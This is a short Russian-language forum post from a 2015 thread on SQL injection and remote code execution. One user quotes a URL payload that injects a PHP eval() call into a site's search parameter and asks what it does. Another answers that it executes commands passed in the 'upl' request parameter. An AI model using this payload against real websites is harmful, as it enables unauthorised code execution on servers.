Тема: SQLi и RCE
Показать сообщение отдельно

  #9  
Старый 29.05.2015, 12:51
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от BabaDook  

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.site.ru/search/?action=index&text=$${@eval($_REQUEST[upl])}[/COLOR][/COLOR] 
Я немного не понял , что это даст?
выполнение через eval() команд из POST и GET параметра upl
 
Ответить с цитированием